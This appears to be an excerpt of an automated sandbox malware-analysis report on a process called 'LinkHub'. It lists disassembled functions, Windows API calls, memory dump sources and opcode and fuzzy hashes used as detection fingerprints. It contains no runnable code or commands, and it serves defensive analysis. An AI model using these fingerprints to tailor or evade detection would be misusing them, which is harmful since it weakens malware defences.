                                                                      • Part of subcall function 00CD08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0944
                                                                      • Part of subcall function 00CD08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?), ref: 00CD0954
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00CF56AE
                                                                    • _wcslen.LIBCMT ref: 00CF57B6
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00CF582C
                                                                    • CoTaskMemFree.OLE32(?), ref: 00CF5837
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 614568839-2785691316
                                                                    • Opcode ID: 7152ad4ce65270c479f4cf3ad90d8eb8593b62cacb159f5f2970f8510fa87d0b
                                                                    • Instruction ID: e945f9bbd97f0866b3860a7c24e192aaf1a28cea24570ed30350819d66bc264f
                                                                    • Opcode Fuzzy Hash: 7152ad4ce65270c479f4cf3ad90d8eb8593b62cacb159f5f2970f8510fa87d0b
                                                                    • Instruction Fuzzy Hash: 32910671D0021DAFDF14DFA4D885AEEBBB9AF08304F10816AEA19A7291DB305A44DF61
                                                                    Function 00D02B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00D02C1F
                                                                    • GetMenuItemCount.USER32(00000000), ref: 00D02C51
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00D02C79
                                                                    • _wcslen.LIBCMT ref: 00D02CAF
                                                                    • GetMenuItemID.USER32(?,?), ref: 00D02CE9
                                                                    • GetSubMenu.USER32(?,?), ref: 00D02CF7
                                                                      • Part of subcall function 00CD4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD43AD
                                                                      • Part of subcall function 00CD4393: GetCurrentThreadId.KERNEL32 ref: 00CD43B4
                                                                      • Part of subcall function 00CD4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CD2F00), ref: 00CD43BB
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D02D7F
                                                                      • Part of subcall function 00CDF292: Sleep.KERNEL32 ref: 00CDF30A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                    • String ID:
                                                                    • API String ID: 4196846111-0
                                                                    • Opcode ID: 6c59fce80717b715e7d749c2094d0ef4cd27ac374688f3e384b57af833b63d6b
                                                                    • Instruction ID: 96609e3d045ed194f11898d580adb8165771c32a0884528ea155991487fce660
                                                                    • Opcode Fuzzy Hash: 6c59fce80717b715e7d749c2094d0ef4cd27ac374688f3e384b57af833b63d6b
                                                                    • Instruction Fuzzy Hash: 36718F75E00215AFCB14EFA4C849BAEB7F5EF48310F148459E85AEB391DB74ED418BA0
                                                                    Function 00D088F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00D08992
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00D0899E
                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00D08A79
                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00D08AAC
                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 00D08AE4
                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00D08B06
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D08B1E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID:
                                                                    • API String ID: 4072528602-0
                                                                    • Opcode ID: 86937218360ea296b891446286c8a49a73309bb8690afddbfe25d014148c8434
                                                                    • Instruction ID: d002441f821d4a5bf5b1da27c583219f42b005f72b8f9707802b8dd466da3875
                                                                    • Opcode Fuzzy Hash: 86937218360ea296b891446286c8a49a73309bb8690afddbfe25d014148c8434
                                                                    • Instruction Fuzzy Hash: 4B718174600304AFDB21AF54C884FBA7BB5EF49310F18045AE9D9A73A1CB31A954EF71
                                                                    Function 00CDB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00CDB8C0
                                                                    • GetKeyboardState.USER32(?), ref: 00CDB8D5
                                                                    • SetKeyboardState.USER32(?), ref: 00CDB936
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CDB964
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CDB983
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CDB9C4
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CDB9E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: b860970d95c077ddd2fb5d855184dd8d339a51ae8812db3976ec8638c506aab4
                                                                    • Instruction ID: 8194ce38e355007c65109704390a9c6b1f9c213e6f6717e1cf87f9e12c772f43
                                                                    • Opcode Fuzzy Hash: b860970d95c077ddd2fb5d855184dd8d339a51ae8812db3976ec8638c506aab4
                                                                    • Instruction Fuzzy Hash: 0651C2A05087D5BEFB3642348C55BBABEA95B06704F09848BE3E9459D2C3D8EEC4E750
                                                                    Function 00CDB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 00CDB6E0
                                                                    • GetKeyboardState.USER32(?), ref: 00CDB6F5
                                                                    • SetKeyboardState.USER32(?), ref: 00CDB756
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CDB782
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CDB79F
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CDB7DE
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CDB7FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: f952744a62883605127bba5ec4407d9940b486663afa5e6fed9e0d26a6c89f1b
                                                                    • Instruction ID: 75816e004e70af7f8d5c487573e5aeb923ac279ce131fbce86806e8225019609
                                                                    • Opcode Fuzzy Hash: f952744a62883605127bba5ec4407d9940b486663afa5e6fed9e0d26a6c89f1b
                                                                    • Instruction Fuzzy Hash: 4F5104A09047D5BEFB328324CC55B76BE995B45304F0A848BF2E846AC2D394EE84E760
                                                                    Function 00CA57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00CA5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00CA57E3
                                                                    • __fassign.LIBCMT ref: 00CA585E
                                                                    • __fassign.LIBCMT ref: 00CA5879
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00CA589F
                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00CA5F16,00000000,?,?,?,?,?,?,?,?,?,00CA5F16,?), ref: 00CA58BE
                                                                    • WriteFile.KERNEL32(?,?,00000001,00CA5F16,00000000,?,?,?,?,?,?,?,?,?,00CA5F16,?), ref: 00CA58F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 41b00a0d592d60d4064f7828a69035b33d95f2d9da561cd6cac93d4002f0570b
                                                                    • Instruction ID: 1f26e76bedb2e4b695e21fa02a308b525cd0cd7ea579c1293ab125e9032d2d71
                                                                    • Opcode Fuzzy Hash: 41b00a0d592d60d4064f7828a69035b33d95f2d9da561cd6cac93d4002f0570b
                                                                    • Instruction Fuzzy Hash: 2B51D57590064ADFCB10CFA8D845BEEBBF9FF0A314F14811AE955E7291D7309A42CB61
                                                                    Function 00C93090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00C930BB
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00C930C3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00C93151
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00C9317C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00C931D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 152810ab309270345d0692d1a225ec447627b57129581394d773f89da159b69c
                                                                    • Instruction ID: ba2e32c65c3d9dff5e3641e5d8896d1825f871e7d3a814dc8a89aa6d877ec58a
                                                                    • Opcode Fuzzy Hash: 152810ab309270345d0692d1a225ec447627b57129581394d773f89da159b69c
                                                                    • Instruction Fuzzy Hash: 2541C734E00288ABCF10DF69CC89A9EBBB5AF45314F148155E925AB3A2D731DF15CBA1
                                                                    Function 00CF1B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CF3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CF3AD7
                                                                      • Part of subcall function 00CF3AAB: _wcslen.LIBCMT ref: 00CF3AF8
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CF1B6F
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1B7E
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1C26
                                                                    • closesocket.WSOCK32(00000000), ref: 00CF1C56
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 2675159561-0
                                                                    • Opcode ID: 51ea5a0a92e4e602b9db32e1be7a0abd2ba9fb5a2cd5bc85fd8de0de686ddef9
                                                                    • Instruction ID: e5505cd545071ac42d8bacffd79ccbbd42d89bf923d65abd41634f380bb96c70
                                                                    • Opcode Fuzzy Hash: 51ea5a0a92e4e602b9db32e1be7a0abd2ba9fb5a2cd5bc85fd8de0de686ddef9
                                                                    • Instruction Fuzzy Hash: 7C41D471600218EFDB109F64C884BB9B7E9EF85324F188059FD199B292D770EE41CBE2
                                                                    Function 00CDD7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CDE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CDD7CD,?), ref: 00CDE714
                                                                      • Part of subcall function 00CDE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CDD7CD,?), ref: 00CDE72D
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00CDD7F0
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00CDD82A
                                                                    • _wcslen.LIBCMT ref: 00CDD8B0
                                                                    • _wcslen.LIBCMT ref: 00CDD8C6
                                                                    • SHFileOperationW.SHELL32(?), ref: 00CDD90C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 3164238972-1173974218
                                                                    • Opcode ID: 97af39c8168558fe5fceb2d657a146f15c8f53e13d516506f5e7615750465e76
                                                                    • Instruction ID: 4829fa1dea14c91395f803800e769e7cdb7341532e91f7543f13e8a507038d6b
                                                                    • Opcode Fuzzy Hash: 97af39c8168558fe5fceb2d657a146f15c8f53e13d516506f5e7615750465e76
                                                                    • Instruction Fuzzy Hash: 8A413571D052189EDF13EBA4CD85BDD77B8AF08340F1000EBA619EB281EB35A788DB50
                                                                    Function 00D03899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D038B8
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D038EB
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D03920
                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D03952
                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D0397C
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D0398D
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D039A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: 0177a2d9fa222a13dd95244a76fc80da221a2a773c30e89a47b5ff90d68a4bc2
                                                                    • Instruction ID: 3e833acfea7dddd5f7740b554c3553b383a22ccebc8024c7b384750b2709d245
                                                                    • Opcode Fuzzy Hash: 0177a2d9fa222a13dd95244a76fc80da221a2a773c30e89a47b5ff90d68a4bc2
                                                                    • Instruction Fuzzy Hash: AA312035644255AFDB21CF89EC85F6437A9EB8A710F1901A4F509CB2B2CBB1AD84CF61
                                                                    Function 00CD808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD80D0
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD80F6
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00CD80F9
                                                                    • SysAllocString.OLEAUT32(?), ref: 00CD8117
                                                                    • SysFreeString.OLEAUT32(?), ref: 00CD8120
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00CD8145
                                                                    • SysAllocString.OLEAUT32(?), ref: 00CD8153
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 382a2dae59adcd8077f467d3c26c40128de54cc2423048b8b24463c5bb615d8f
                                                                    • Instruction ID: 62e01ce35308c84604181dca5e424bbf2646e192a4731aef1f7e6874bcb8e44b
                                                                    • Opcode Fuzzy Hash: 382a2dae59adcd8077f467d3c26c40128de54cc2423048b8b24463c5bb615d8f
                                                                    • Instruction Fuzzy Hash: A721A772600219AFDF10DFA8CC88DBF73ADEB093607048426FA15DB390DA70ED4A8760
                                                                    Function 00CD8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD81A9
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD81CF
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00CD81D2
                                                                    • SysAllocString.OLEAUT32 ref: 00CD81F3
                                                                    • SysFreeString.OLEAUT32 ref: 00CD81FC
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00CD8216
                                                                    • SysAllocString.OLEAUT32(?), ref: 00CD8224
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 47c9e3e500a037ff015d7b6f638eb6727b30268d8f39dc293a09119b2d139657
                                                                    • Instruction ID: 2d34207d46d17eb91af7c50a93be59f4e7d2e2e11a413ee27bf37f844a420f0f
                                                                    • Opcode Fuzzy Hash: 47c9e3e500a037ff015d7b6f638eb6727b30268d8f39dc293a09119b2d139657
                                                                    • Instruction Fuzzy Hash: 05217F71600214BFDB10ABE8DC89EAA77EDEB093607148126FA15CB3A0DA70ED45CB64
                                                                    Function 00CE0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00CE0E99
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CE0ED5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
                                                                    • Opcode ID: db5f036675c5aa0240c3c50f5a3401f62d48523679b9df8311a0c2329fd38f7e
                                                                    • Instruction ID: 7a72a68d8ab2c94c12c79d11ee64271f10c9ee38a0c3a2eb517ce6c5156fb69f
                                                                    • Opcode Fuzzy Hash: db5f036675c5aa0240c3c50f5a3401f62d48523679b9df8311a0c2329fd38f7e
                                                                    • Instruction Fuzzy Hash: 9821717050038AABDB308FA6DC05A9A77A9AF54320F304A59FCA5D72D0D7B09990CB90
                                                                    Function 00CE0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00CE0F6D
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CE0FA8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
